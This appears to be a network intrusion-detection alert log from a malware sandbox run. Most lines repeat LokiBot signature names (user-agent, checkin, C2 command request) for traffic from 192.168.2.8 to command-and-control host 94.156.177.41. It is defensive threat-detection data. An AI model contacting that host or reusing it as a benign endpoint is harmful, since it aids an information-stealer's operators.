2025-01-11T01:42:36.756536+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49722	94.156.177.41	80	TCP
2025-01-11T01:42:36.756536+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49722	94.156.177.41	80	TCP
2025-01-11T01:42:36.756536+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49722	94.156.177.41	80	TCP
2025-01-11T01:42:37.453451+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49722	94.156.177.41	80	TCP
2025-01-11T01:42:37.453451+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49722	94.156.177.41	80	TCP
2025-01-11T01:42:37.616845+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49723	94.156.177.41	80	TCP
2025-01-11T01:42:37.616845+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49723	94.156.177.41	80	TCP
2025-01-11T01:42:37.616845+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49723	94.156.177.41	80	TCP
2025-01-11T01:42:38.373443+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49723	94.156.177.41	80	TCP
2025-01-11T01:42:38.373443+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49723	94.156.177.41	80	TCP
2025-01-11T01:42:38.534914+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49724	94.156.177.41	80	TCP
2025-01-11T01:42:38.534914+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49724	94.156.177.41	80	TCP
2025-01-11T01:42:38.534914+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49724	94.156.177.41	80	TCP
2025-01-11T01:42:39.300522+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49724	94.156.177.41	80	TCP
2025-01-11T01:42:39.300522+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49724	94.156.177.41	80	TCP
2025-01-11T01:42:39.453290+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49725	94.156.177.41	80	TCP
2025-01-11T01:42:39.453290+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49725	94.156.177.41	80	TCP
2025-01-11T01:42:39.453290+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49725	94.156.177.41	80	TCP
2025-01-11T01:42:40.182347+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49725	94.156.177.41	80	TCP
2025-01-11T01:42:40.182347+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49725	94.156.177.41	80	TCP
2025-01-11T01:42:40.352448+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49726	94.156.177.41	80	TCP
2025-01-11T01:42:40.352448+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49726	94.156.177.41	80	TCP
2025-01-11T01:42:40.352448+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49726	94.156.177.41	80	TCP
2025-01-11T01:42:41.051405+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49726	94.156.177.41	80	TCP
2025-01-11T01:42:41.051405+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49726	94.156.177.41	80	TCP
2025-01-11T01:42:41.207139+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49727	94.156.177.41	80	TCP
2025-01-11T01:42:41.207139+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49727	94.156.177.41	80	TCP
2025-01-11T01:42:41.207139+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49727	94.156.177.41	80	TCP
2025-01-11T01:42:41.904144+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49727	94.156.177.41	80	TCP
2025-01-11T01:42:41.904144+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49727	94.156.177.41	80	TCP
2025-01-11T01:42:42.069381+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49728	94.156.177.41	80	TCP
2025-01-11T01:42:42.069381+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49728	94.156.177.41	80	TCP
2025-01-11T01:42:42.069381+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49728	94.156.177.41	80	TCP
2025-01-11T01:42:42.789215+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49728	94.156.177.41	80	TCP
2025-01-11T01:42:42.789215+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49728	94.156.177.41	80	TCP
2025-01-11T01:42:42.979513+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49729	94.156.177.41	80	TCP
2025-01-11T01:42:42.979513+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49729	94.156.177.41	80	TCP
2025-01-11T01:42:42.979513+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49729	94.156.177.41	80	TCP
2025-01-11T01:42:43.880204+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49729	94.156.177.41	80	TCP
2025-01-11T01:42:43.880204+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49729	94.156.177.41	80	TCP
2025-01-11T01:42:44.030365+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49730	94.156.177.41	80	TCP
2025-01-11T01:42:44.030365+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49730	94.156.177.41	80	TCP
2025-01-11T01:42:44.030365+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49730	94.156.177.41	80	TCP
2025-01-11T01:42:44.715443+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49730	94.156.177.41	80	TCP
2025-01-11T01:42:44.715443+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49730	94.156.177.41	80	TCP
2025-01-11T01:42:44.878656+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49731	94.156.177.41	80	TCP
2025-01-11T01:42:44.878656+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49731	94.156.177.41	80	TCP
2025-01-11T01:42:44.878656+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49731	94.156.177.41	80	TCP
2025-01-11T01:42:45.597583+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49731	94.156.177.41	80	TCP
2025-01-11T01:42:45.597583+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49731	94.156.177.41	80	TCP
2025-01-11T01:42:45.910982+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49732	94.156.177.41	80	TCP
2025-01-11T01:42:45.910982+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49732	94.156.177.41	80	TCP
2025-01-11T01:42:45.910982+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49732	94.156.177.41	80	TCP
2025-01-11T01:42:46.616967+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49732	94.156.177.41	80	TCP
2025-01-11T01:42:46.616967+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49732	94.156.177.41	80	TCP
2025-01-11T01:42:46.766963+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49733	94.156.177.41	80	TCP
2025-01-11T01:42:46.766963+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49733	94.156.177.41	80	TCP
2025-01-11T01:42:46.766963+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49733	94.156.177.41	80	TCP
2025-01-11T01:42:47.494263+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49733	94.156.177.41	80	TCP
2025-01-11T01:42:47.494263+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49733	94.156.177.41	80	TCP
2025-01-11T01:42:47.676875+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49734	94.156.177.41	80	TCP
2025-01-11T01:42:47.676875+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49734	94.156.177.41	80	TCP
2025-01-11T01:42:47.676875+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49734	94.156.177.41	80	TCP
2025-01-11T01:42:48.388017+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49734	94.156.177.41	80	TCP
2025-01-11T01:42:48.388017+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49734	94.156.177.41	80	TCP
2025-01-11T01:42:48.545843+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49735	94.156.177.41	80	TCP
2025-01-11T01:42:48.545843+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49735	94.156.177.41	80	TCP
2025-01-11T01:42:48.545843+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49735	94.156.177.41	80	TCP
2025-01-11T01:42:49.285558+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49735	94.156.177.41	80	TCP
2025-01-11T01:42:49.285558+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49735	94.156.177.41	80	TCP
2025-01-11T01:42:49.438319+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49736	94.156.177.41	80	TCP
2025-01-11T01:42:49.438319+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49736	94.156.177.41	80	TCP
2025-01-11T01:42:49.438319+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49736	94.156.177.41	80	TCP
2025-01-11T01:42:50.165740+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49736	94.156.177.41	80	TCP
2025-01-11T01:42:50.165740+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49736	94.156.177.41	80	TCP
2025-01-11T01:42:50.341121+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49737	94.156.177.41	80	TCP
2025-01-11T01:42:50.341121+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49737	94.156.177.41	80	TCP
2025-01-11T01:42:50.341121+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49737	94.156.177.41	80	TCP
2025-01-11T01:42:51.033454+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49737	94.156.177.41	80	TCP
2025-01-11T01:42:51.033454+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49737	94.156.177.41	80	TCP
2025-01-11T01:42:51.209451+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49738	94.156.177.41	80	TCP
2025-01-11T01:42:51.209451+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49738	94.156.177.41	80	TCP
2025-01-11T01:42:51.209451+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49738	94.156.177.41	80	TCP
2025-01-11T01:42:51.929916+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49738	94.156.177.41	80	TCP
2025-01-11T01:42:51.929916+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49738	94.156.177.41	80	TCP
2025-01-11T01:42:52.288988+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49739	94.156.177.41	80	TCP
2025-01-11T01:42:52.288988+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49739	94.156.177.41	80	TCP
2025-01-11T01:42:52.288988+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49739	94.156.177.41	80	TCP
2025-01-11T01:42:53.011005+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49739	94.156.177.41	80	TCP
2025-01-11T01:42:53.011005+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49739	94.156.177.41	80	TCP
2025-01-11T01:42:53.175499+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49740	94.156.177.41	80	TCP
2025-01-11T01:42:53.175499+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49740	94.156.177.41	80	TCP
2025-01-11T01:42:53.175499+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49740	94.156.177.41	80	TCP
2025-01-11T01:42:54.019699+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49740	94.156.177.41	80	TCP
2025-01-11T01:42:54.019699+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49740	94.156.177.41	80	TCP
2025-01-11T01:42:54.184422+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49741	94.156.177.41	80	TCP
2025-01-11T01:42:54.184422+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49741	94.156.177.41	80	TCP
2025-01-11T01:42:54.184422+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49741	94.156.177.41	80	TCP
2025-01-11T01:42:54.883072+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49741	94.156.177.41	80	TCP
2025-01-11T01:42:54.883072+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49741	94.156.177.41	80	TCP
2025-01-11T01:42:55.035617+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49742	94.156.177.41	80	TCP
2025-01-11T01:42:55.035617+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49742	94.156.177.41	80	TCP
2025-01-11T01:42:55.035617+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49742	94.156.177.41	80	TCP
2025-01-11T01:42:55.733113+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49742	94.156.177.41	80	TCP
2025-01-11T01:42:55.733113+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49742	94.156.177.41	80	TCP
2025-01-11T01:42:55.992626+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49743	94.156.177.41	80	TCP
2025-01-11T01:42:55.992626+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49743	94.156.177.41	80	TCP
2025-01-11T01:42:55.992626+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49743	94.156.177.41	80	TCP
2025-01-11T01:42:56.756990+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49743	94.156.177.41	80	TCP
2025-01-11T01:42:56.756990+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49743	94.156.177.41	80	TCP
2025-01-11T01:42:56.917464+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49744	94.156.177.41	80	TCP
2025-01-11T01:42:56.917464+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49744	94.156.177.41	80	TCP
2025-01-11T01:42:56.917464+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49744	94.156.177.41	80	TCP
2025-01-11T01:42:57.657232+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49744	94.156.177.41	80	TCP
2025-01-11T01:42:57.657232+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49744	94.156.177.41	80	TCP
2025-01-11T01:42:57.813692+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49745	94.156.177.41	80	TCP
2025-01-11T01:42:57.813692+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49745	94.156.177.41	80	TCP
2025-01-11T01:42:57.813692+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49745	94.156.177.41	80	TCP
2025-01-11T01:42:58.531476+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49745	94.156.177.41	80	TCP
2025-01-11T01:42:58.531476+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49745	94.156.177.41	80	TCP
2025-01-11T01:42:58.986101+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49746	94.156.177.41	80	TCP
2025-01-11T01:42:58.986101+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49746	94.156.177.41	80	TCP
2025-01-11T01:42:58.986101+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49746	94.156.177.41	80	TCP
2025-01-11T01:42:59.839528+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49746	94.156.177.41	80	TCP
2025-01-11T01:42:59.839528+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49746	94.156.177.41	80	TCP
2025-01-11T01:43:00.003340+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49747	94.156.177.41	80	TCP
2025-01-11T01:43:00.003340+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49747	94.156.177.41	80	TCP
2025-01-11T01:43:00.003340+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49747	94.156.177.41	80	TCP
2025-01-11T01:43:00.718117+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49747	94.156.177.41	80	TCP
2025-01-11T01:43:00.718117+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49747	94.156.177.41	80	TCP
2025-01-11T01:43:00.875736+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49748	94.156.177.41	80	TCP
2025-01-11T01:43:00.875736+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49748	94.156.177.41	80	TCP
2025-01-11T01:43:00.875736+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49748	94.156.177.41	80	TCP
2025-01-11T01:43:01.574531+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49748	94.156.177.41	80	TCP
2025-01-11T01:43:01.574531+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49748	94.156.177.41	80	TCP
2025-01-11T01:43:01.944954+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49749	94.156.177.41	80	TCP
2025-01-11T01:43:01.944954+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49749	94.156.177.41	80	TCP
2025-01-11T01:43:01.944954+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49749	94.156.177.41	80	TCP
2025-01-11T01:43:02.677370+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49749	94.156.177.41	80	TCP
2025-01-11T01:43:02.677370+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49749	94.156.177.41	80	TCP
2025-01-11T01:43:02.826098+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49750	94.156.177.41	80	TCP
2025-01-11T01:43:02.826098+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49750	94.156.177.41	80	TCP
2025-01-11T01:43:02.826098+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49750	94.156.177.41	80	TCP
2025-01-11T01:43:03.548607+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49750	94.156.177.41	80	TCP
2025-01-11T01:43:03.548607+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49750	94.156.177.41	80	TCP
2025-01-11T01:43:03.707674+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51230	94.156.177.41	80	TCP
2025-01-11T01:43:03.707674+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51230	94.156.177.41	80	TCP
2025-01-11T01:43:03.707674+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51230	94.156.177.41	80	TCP
2025-01-11T01:43:04.445387+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51230	94.156.177.41	80	TCP
2025-01-11T01:43:04.445387+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51230	94.156.177.41	80	TCP
2025-01-11T01:43:04.854034+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51231	94.156.177.41	80	TCP
2025-01-11T01:43:04.854034+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51231	94.156.177.41	80	TCP
2025-01-11T01:43:04.854034+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51231	94.156.177.41	80	TCP
2025-01-11T01:43:05.582800+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51231	94.156.177.41	80	TCP
2025-01-11T01:43:05.582800+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51231	94.156.177.41	80	TCP
2025-01-11T01:43:05.736299+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51232	94.156.177.41	80	TCP
2025-01-11T01:43:05.736299+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51232	94.156.177.41	80	TCP
2025-01-11T01:43:05.736299+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51232	94.156.177.41	80	TCP
2025-01-11T01:43:06.451735+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51232	94.156.177.41	80	TCP
2025-01-11T01:43:06.451735+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51232	94.156.177.41	80	TCP
2025-01-11T01:43:06.614277+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51233	94.156.177.41	80	TCP
2025-01-11T01:43:06.614277+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51233	94.156.177.41	80	TCP
2025-01-11T01:43:06.614277+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51233	94.156.177.41	80	TCP
2025-01-11T01:43:07.362946+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51233	94.156.177.41	80	TCP
2025-01-11T01:43:07.362946+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51233	94.156.177.41	80	TCP
2025-01-11T01:43:07.773450+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51234	94.156.177.41	80	TCP
2025-01-11T01:43:07.773450+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51234	94.156.177.41	80	TCP
2025-01-11T01:43:07.773450+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51234	94.156.177.41	80	TCP
2025-01-11T01:43:08.501687+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51234	94.156.177.41	80	TCP
2025-01-11T01:43:08.501687+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51234	94.156.177.41	80	TCP
2025-01-11T01:43:08.660221+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51235	94.156.177.41	80	TCP
2025-01-11T01:43:08.660221+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51235	94.156.177.41	80	TCP
2025-01-11T01:43:08.660221+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51235	94.156.177.41	80	TCP
2025-01-11T01:43:09.359941+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51235	94.156.177.41	80	TCP
2025-01-11T01:43:09.359941+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51235	94.156.177.41	80	TCP
2025-01-11T01:43:09.514398+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51236	94.156.177.41	80	TCP
2025-01-11T01:43:09.514398+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51236	94.156.177.41	80	TCP
2025-01-11T01:43:09.514398+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51236	94.156.177.41	80	TCP
2025-01-11T01:43:10.258088+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51236	94.156.177.41	80	TCP
2025-01-11T01:43:10.258088+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51236	94.156.177.41	80	TCP
2025-01-11T01:43:10.707200+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51237	94.156.177.41	80	TCP
2025-01-11T01:43:10.707200+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51237	94.156.177.41	80	TCP
2025-01-11T01:43:10.707200+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51237	94.156.177.41	80	TCP
2025-01-11T01:43:11.447670+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51237	94.156.177.41	80	TCP
2025-01-11T01:43:11.447670+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51237	94.156.177.41	80	TCP
2025-01-11T01:43:11.607612+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51238	94.156.177.41	80	TCP
2025-01-11T01:43:11.607612+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51238	94.156.177.41	80	TCP
2025-01-11T01:43:11.607612+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51238	94.156.177.41	80	TCP
2025-01-11T01:43:12.357348+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51238	94.156.177.41	80	TCP
2025-01-11T01:43:12.357348+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51238	94.156.177.41	80	TCP
2025-01-11T01:43:12.528797+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51239	94.156.177.41	80	TCP
2025-01-11T01:43:12.528797+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51239	94.156.177.41	80	TCP
2025-01-11T01:43:12.528797+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51239	94.156.177.41	80	TCP
2025-01-11T01:43:13.250209+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51239	94.156.177.41	80	TCP
2025-01-11T01:43:13.250209+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51239	94.156.177.41	80	TCP
2025-01-11T01:43:13.572275+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51240	94.156.177.41	80	TCP
2025-01-11T01:43:13.572275+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51240	94.156.177.41	80	TCP
2025-01-11T01:43:13.572275+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	51240	94.156.177.41	80	TCP
2025-01-11T01:43:14.455819+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	51240	94.156.177.41	80	TCP
2025-01-11T01:43:14.455819+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	51240	94.156.177.41	80	TCP
2025-01-11T01:43:14.611221+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	51241	94.156.177.41	80	TCP
2025-01-11T01:43:14.611221+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	51241	94.156.177.41	80	TCP
